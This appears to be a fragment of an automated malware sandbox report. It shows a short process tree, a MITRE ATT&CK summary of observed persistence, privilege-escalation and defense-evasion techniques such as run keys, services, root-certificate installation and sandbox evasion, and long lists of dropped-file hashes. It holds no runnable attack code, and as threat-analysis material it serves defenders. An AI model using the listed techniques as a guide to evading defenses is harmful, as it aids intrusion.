C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1627231940-1943147695-246257745-1267624438-817299731-1761709094-506565777881458344"1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5941⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Modify Registry
9Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
768KB
MD5cad15524871fdee4673222102dda7ede
SHA1538d594b40e7acd4b84747c67c8e7144f3b35e90
SHA2562bb329e2fad7aef3476b700629f8184a4fe881c1d8cf2037cf7c2e3936374ca4
SHA51272cc2386e8eccacf7dc51ddb437d98c27406dcfed7b640dafba2220f2a86ab126e70c42b7c032d721ddbca445e74420518d1a6a8f9bfa436d8b5e38caf1bd874
-
Filesize
20KB
MD5c9ff7748d8fcef4cf84a5501e996a641
SHA102867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA2564d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73
-
Filesize
92KB
MD56546286a9b03ac7e89992fb3e2724848
SHA107f266bb3e606f0a617bd76d2904588c389765bd
SHA25645166748f326b99dd3ae8a96ff218c94661722932c817e986298db3a17c2de41
SHA5123e6f5e27ab91e02e4b00544bde82d39a743777e219779e71e4498f322760c12b17412a0cec042cdc93b704b0a647703a9e576be03c1f7d7dece1d0e21fcec03d
-
Filesize
360KB
MD580c413180b6bd0dd664adc4e0665b494
SHA1e791e4a3391fc6b7bcb58399cd4fa3c52a06b940
SHA2566d99cec56614b6b8a23dfa84a50c6bbfde535411c6366ac2bcc20c9f5af62880
SHA512347f4ae6f308b37d055a6177478e45ab3838d7020abed70c7aa138d2c3771e709de204da8550aebdcaa6139d869dc7328cc7e645c4dd48d1066f9ad70225644a
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
195KB
MD51d3eda04f0c2f84002d479177a9a0dc1
SHA17289fcbbb18de90735af84b5c99818cd5411c87f
SHA256029375780db860b29c868bb8e790fc388d6a0cce986be2b6af6e0bd5d85a5e31
SHA5121c73e74e31ee730b2dfade6e700f66b94cc15bf4167427ca4a9b3a1b5132e168a73276d6ccba0602b6ba37c3cc72312f06a9c42a6a731175a4daf72307783c94
-
Filesize
339KB
MD52e13eb39c176ac29f7794d9770e3c1f4
SHA1f4b098f12e41560242e6f5d9975b9c6187d26866
SHA2565b6429f38ac48a93050ffdaea60282c3b30f278534200ada99363398102cbe55
SHA51221817d4f56e58a593c110e00958fbb9899a1c643c0864e726c462c694c000f4152cdb501bcdddb70a17b0fd72a1d8f46537e20a71e907b8db67dffd04492202d
-
Filesize
300KB
MD55d2f16ef266104387e196951e7a54383
SHA1025c8f532bd1b3824730e2b110da6240fad56201
SHA256a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39
SHA512ff9a1c4750bce23ab2c4560e74a184043e7734d60d9b363cf731f25dc224ee6ad534ab76473297d6a32ab0c2caa1a1f814e9b70921bc9d9de19abf39f8ae2d6a
-
Filesize
9KB
MD52ea6c5e97869622dfe70d2b34daf564e
SHA145500603bf8093676b66f056924a71e04793827a
SHA2565f28bba8bd23cdb5c8a3fa018727bcf365eaf31c06b7bc8d3f3097a85db037f3
SHA512f8f82b5875e8257206561de22ddbd8b5d9a2393e0da62f57c5a429ca233c7443c34647cc2253cf766bfaaf8177acb5c0627ab2f2418f5968f0a6fdec54244d43
-
Filesize
362KB
MD5008d1475b7ce694e3e9572002d20c4d6
SHA108b8b12302da01b25b84503728e139d66a42ea0a
SHA256f7f59e244cfca65e5a95831792366bbc2fb5c495d17546b768fb9c68ce3219fe
SHA51267c2b08b5835cf34e5d2948771b12bb78f4c364f2a086d3b50d50e570d83ecfc2e1cd38e0882a23e79008795d7e638b705af98c87cb1f6dd8a9826bcae482b9d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
98KB
MD576ee2a56701c3a6b91bfa35ccb642a24
SHA15ae15d9ce4a619bb4db8f3aadc705c53dade7dae
SHA256717fa34397d2dfeec8793634233d79cbf7ecce83c99799df59e5100ff5aaa254
SHA512e8f86f0102871c7cd72a767bd358f95d828c4b285ef9da06e7f936c525189fa83c29cfce259fd6e15c4bcfad56ac301a0e6152887afc7667d973258762c67d13
-
Filesize
92KB
MD59b9c9ac93289a00ab073beb99a0206b4
SHA1e62e2d9008397f433c2b6129150ed94a95ed511d
SHA25671bd2fee2e7d5ad1ff613962ced52d77c938d454f2e1605105ef4951c14ddb3c
SHA512da051f85b0580533e722938aa9202ba5c2407fc3d24661b09269510277380604a7949b721fad8273ba375293f3c8b7888ed9b8110d34b774bd4e4facbeec0df2
-
Filesize
64KB
MD5a523dc52e2ddf38237a17b435157b86e
SHA1f82bc3815f32486f8b135ca43892f5bf2c6506d6
SHA256d0aeb2c65efccae50a49875c935d1ef8eaf6baa8445b01fd834dd38e64db1c91
SHA512330b93d22bf232c77b3ee6f08e0863488838d4a8fb7b8e499e22aa067c93a17f8b9018e0a32babaffdfaed32e0981e11fff7859789f642120969b01eb7b05695
-
Filesize
92KB
MD5c500b4c1d9b5161ee29730790b6c5162
SHA146549f43922f86872be2ae3a823407183af74094
SHA25661bb890623768047763c090987b5fde5bb8d9d9e3b25ac82d6e10276a12de5c7
SHA512c7187459a0ecccd46091ebaff9b68e0fe1f3c4639d4dac9bc0ea7b2d68781c69c36dc6c75062a4a4ac65bd21134cd7da3c1c8783a6a0434fc77041af39914db8
-
Filesize
7KB
MD5108cfce88a66e9db9b22b2f606f6b328
SHA1d27a4b3e18d69d58458f84168081e4e2ba08f715
SHA25670477d94495dc747bc0ad711b9d09450a72bc74f99c6e987b3aa0e20f227bd96
SHA512f2cd15f1e9c03ce8b8ab040f571af96ef65093d9fc0104acba478c5d6da356a6f7c0c7fcb2273e525b1d27164a1d3a32d24d60da7fb8fe11476ed4d5128bdff0
-
Filesize
5.4MB
MD541ab08c1955fce44bfd0c76a64d1945a
SHA12b9cb05f4de5d98c541d15175d7f0199cbdd0eea
SHA256dd12cb27b3867341bf6ca48715756500d3ec56c19b21bb1c1290806aa74cb493
SHA51238834ae703a8541b4fec9a1db94cfe296ead58649bb1d4873b517df14d0c6a9d25e49ff04c2bf6bb0188845116a4e894aae930d849f9be8c98d2ce51da1ef116
-
Filesize
80KB
-
Filesize
7.0MB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.0MB
-
Filesize
444KB
-
Filesize
5.9MB
-
Filesize
5.9MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
4.0MB
-
Filesize
8.9MB
-
Filesize
80KB
-
Filesize
80KB
-
Filesize
80KB
-
Filesize
2.2MB
-
Filesize
972KB
-
Filesize
112KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
2.2MB
-
Filesize
9.1MB
-
Filesize
8.9MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
9.1MB
-
Filesize
256KB
-
Filesize
14.6MB
-
Filesize
32KB
-
Filesize
6.9MB
-
Filesize
256KB
-
Filesize
6.9MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
284KB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
8KB
-
Filesize
1.1MB
-
Filesize
14.6MB
-
Filesize
14.6MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
4.9MB
-
Filesize
4KB
-
Filesize
752KB
-
Filesize
752KB
-
Filesize
4KB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
5.4MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.4MB
-
Filesize
5.4MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
4.0MB
-
Filesize
9.1MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
256KB
-
Filesize
6.9MB
-
Filesize
256KB
-
Filesize
6.9MB
-
Filesize
328KB